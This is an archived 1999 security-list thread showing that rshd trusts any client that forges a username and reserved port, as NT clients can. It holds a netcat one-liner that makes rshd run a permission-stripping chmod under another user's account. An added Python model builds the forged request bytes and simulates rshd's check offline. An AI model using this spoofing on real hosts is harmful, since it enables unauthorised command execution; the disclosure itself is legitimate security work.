nt.rsh.rcp.txt

1999-08-17T00:00:00
ID PACKETSTORM:12054
Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00

Description

Date: Thu, 8 Apr 1999 19:11:54 -0700  
From: Eric Gisin <ericg@TECHIE.COM>  
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM  
Subject: rsh/rcp is not secure  
  
This is really a UNIX rshd bug, but it affects users of the NT clients.  
  
It's old news that the BSD rsh/rcp services are not secure, however rshd is  
still enabled in many UNIX systems. There are rsh/rcp clients in Windows  
NT, and people are not aware of the ease of defeating security in this  
environment.  
  
The security of this service is based on privileged ports, which are not  
widely implemented. The NT versions of rcp/rsh have no special privileges  
like the UNIX versions. Anyone can modify the source or use netcat to fake  
the client username. For example,  
D:> nc -v unixhost 514 -p 666  
^@newbie^@newbie^@chmod a= .^@  
This will execute the chmod command under newbie's account, if he permits  
access from that client machine in .rhosts.  
  
Basically the problem is since Windows NT includes rsh/rcp, people assume  
it's as secure as the UNIX counterpart, which is not the case.  
  
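The netcat line above works because the entire rshd "authentication" is a function of three things the client controls or influences: the source port, the reverse-DNS name of the peer, and a username string the client simply asserts. The following Python model is an added example, not code from the original post; it reproduces the BSD rsh request format and rshd's trust decision so the point can be checked offline. The hostnames, the `.rhosts` contents and all function names are constructed for illustration.

```python
"""
Added example (not part of the original Packet Storm post): a model of the
BSD rsh request and of the trust check rshd applies to it. Hostnames,
.rhosts contents and function names below are constructed assumptions.
"""
from typing import Dict, List, Optional, Tuple

NUL = b"\x00"
IPPORT_RESERVED = 1024


def build_rsh_request(client_user: str, server_user: str, command: str,
                      stderr_port: Optional[int] = None) -> bytes:
    """Build the bytes an rsh client sends to rshd on TCP port 514.

    Wire format (BSD rshd): four NUL-terminated fields, in order
      1. stderr port on the client (empty = no separate stderr socket)
      2. client-side username (asserted by the client, never verified)
      3. server-side username (the account to run the command as)
      4. the command line
    The netcat payload in the post, ^@newbie^@newbie^@chmod a= .^@, is
    exactly this with an empty stderr port field.
    """
    for field in (client_user, server_user, command):
        if "\x00" in field:
            raise ValueError("rsh fields cannot contain NUL")
    port_field = b"" if stderr_port is None else str(stderr_port).encode()
    return (port_field + NUL + client_user.encode() + NUL
            + server_user.encode() + NUL + command.encode() + NUL)


def parse_rsh_request(data: bytes) -> Dict[str, object]:
    """Split a request into its four fields the way rshd reads them."""
    parts = data.split(NUL)
    if len(parts) != 5 or parts[4] != b"":  # four fields, each NUL-terminated
        raise ValueError("malformed rsh request")
    port_field, client_user, server_user, command = parts[:4]
    return {
        "stderr_port": int(port_field) if port_field else None,
        "client_user": client_user.decode(),
        "server_user": server_user.decode(),
        "command": command.decode(),
    }


def source_port_acceptable(port: int) -> bool:
    """rshd insists the client's source port lies in the reserved range 512..1023.
    On UNIX only root can bind there; on NT any user can, and nc -p picks it."""
    return 512 <= port < IPPORT_RESERVED


# .rhosts model: server username -> list of (host, user); user None means
# "the same username as the account being logged into".
Rhosts = Dict[str, List[Tuple[str, Optional[str]]]]


def rshd_authorizes(source_port: int, client_host: str,
                    request: Dict[str, object], rhosts: Rhosts) -> bool:
    """rshd's whole decision: source port range plus a .rhosts line matching
    (peer hostname, client-asserted username). No password, no key."""
    if not source_port_acceptable(source_port):
        return False
    for host, user in rhosts.get(str(request["server_user"]), ()):
        if host != client_host:
            continue
        wanted = user if user is not None else request["server_user"]
        if wanted == request["client_user"]:
            return True
    return False


def demo() -> Dict[str, bool]:
    """Compare a genuine rsh client with the netcat forgery from the post."""
    # Constructed: ~newbie/.rhosts on unixhost contains the single line
    # "ntclient.example.com", trusting that host for the same username.
    rhosts: Rhosts = {"newbie": [("ntclient.example.com", None)]}
    req = parse_rsh_request(build_rsh_request("newbie", "newbie", "chmod a= ."))
    return {
        # real rsh on a UNIX client, bound by root to a reserved port
        "real_rsh": rshd_authorizes(1020, "ntclient.example.com", req, rhosts),
        # the post's forgery: nc -p 666 from an ordinary NT user account
        "netcat_p666": rshd_authorizes(666, "ntclient.example.com", req, rhosts),
        # the only thing the check ever catches: an unreserved source port
        "high_port": rshd_authorizes(40000, "ntclient.example.com", req, rhosts),
        # reverse DNS of the peer must still match a .rhosts entry
        "other_host": rshd_authorizes(666, "attacker.example.com", req, rhosts),
    }


if __name__ == "__main__":
    print(build_rsh_request("newbie", "newbie", "chmod a= ."))
    for label, allowed in demo().items():
        print(f"{label:12s} -> {'authorized' if allowed else 'rejected'}")
```

The model makes the two cases that matter indistinguishable: `real_rsh` and `netcat_p666` are identical inputs to rshd, so it returns the same answer for both. The reserved-port range is a property of the client's operating system, not of the user, and the client username is just a string in the request.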
--------------------------------------------------------------------------  
  
Date: Fri, 9 Apr 1999 09:28:04 -0700  
From: David LeBlanc <dleblanc@MINDSPRING.COM>  
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM  
Subject: Re: rsh/rcp is not secure  
  
At 07:11 PM 4/8/99 -0700, Eric Gisin wrote:  
  
>Basically the problem is since Windows NT includes rsh/rcp, people assume  
>it's as secure as the UNIX counterpart, which is not the case.  
  
The UNIX counterpart isn't really all that secure in any case - it assumes  
that no one on the network can be root, and so come from a low port.  
  
Something else to think about is that running a rshd on NT isn't usually a  
good idea - several implementations run everything as LocalSystem, and the  
ones that don't store live user passwords.  
  
These utilities are full of other security holes - look at the checks in  
the various scanning products for some examples. Safest thing is just not  
to run rsh, rlogin and rexec.  
  
  
David LeBlanc  
dleblanc@mindspring.com  